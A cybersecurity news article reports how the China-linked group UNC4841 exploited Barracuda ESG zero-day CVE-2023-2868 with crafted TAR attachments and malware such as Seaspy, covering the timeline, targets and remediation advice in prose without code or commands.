Suspected Chinese hackers implicated in Barracuda ESG zero-day attack incidents

A hacker group known as UNC4841, believed to have affiliations with China, has been identified as the culprit behind a series of data theft attacks on Barracuda ESG (Email Security Gateway) appliances. The attacks exploited a zero-day vulnerability, CVE-2023-2868, in Barracuda’s email attachment scanning module, which has since been patched.

The exploitation of the zero-day vulnerability began around October 10, 2022, with the threat actors deploying previously unknown malware onto vulnerable Barracuda ESG devices and extracting sensitive data. The flaw was discovered by the vendor on May 19, 2023, prompting immediate disclosure and the release of security updates.

Barracuda took an extraordinary step of replacing affected devices for free rather than relying on reimaging with new firmware. This decision was driven by the suspicion that the threat actors had compromised the devices at a deep level, making it challenging to ensure complete removal of the malware.

According to Mandiant, the incident response division of cybersecurity company FireEye, the hacking group UNC4841 is known for conducting cyber espionage activities in support of the Chinese government. The attacks initiated by UNC4841 involved sending malicious emails with disguised “.tar” file attachments (posing as “.jpg” or “.dat” files) to exploit vulnerabilities in Barracuda ESG devices. When the Barracuda Email Security Gateway attempted to scan these attachments, the exploit took advantage of the CVE-2023-2868 flaw to execute remote commands on the devices.

Once remote access to the Barracuda ESG devices was established, the threat actors employed malware strains named “Saltwater,” “Seaspy,” and “Seaside” to pilfer email data. UNC4841 specifically targeted certain data for exfiltration and occasionally utilized compromised ESG appliances to navigate the victims’ networks or send malicious emails to other affected devices.

Barracuda’s discovery of the breach and subsequent patch release prompted UNC4841 to modify their malware and adopt diversified persistence techniques to elude detection based on Indicators of Compromise (IoC). Between May 22 and May 24, 2023, the hackers launched an intensified attack campaign targeting vulnerable devices in government agencies and other significant organizations across at least 16 countries.

The attack chain involved the exploitation of CVE-2023-2868 through manipulated TAR file attachments to execute a base64 encoded reverse shell payload on vulnerable Barracuda ESG appliances. This payload established a new session, created an interactive shell, and utilized OpenSSL for communication with specified IP addresses and ports. The threat actors employed wget commands to retrieve additional payloads from their command-and-control (C2) servers, primarily utilizing “Saltwater,” “Seaspy,” and “Seaside.”

UNC4841’s persistence mechanisms included Seaspy, a passive tool that acted as a PCAP filter, as well as Sandbar, which concealed the activities of Seaspy by hiding Linux server processes. The hackers displayed rapid lateral movement and conducted targeted scans for specific email messages within compromised appliances, focusing on organizations such as ASEAN Ministry of Foreign Affairs (MFAs), foreign trade offices, and academic research institutions in Taiwan and Hong Kong.

Given the likelihood of UNC4841 diversifying their tactics to avoid detection, organizations are advised to remain highly vigilant. It is recommended to replace compromised Barracuda ESG appliances, regardless of their patch level, and conduct thorough investigations using the provided indicators of compromise.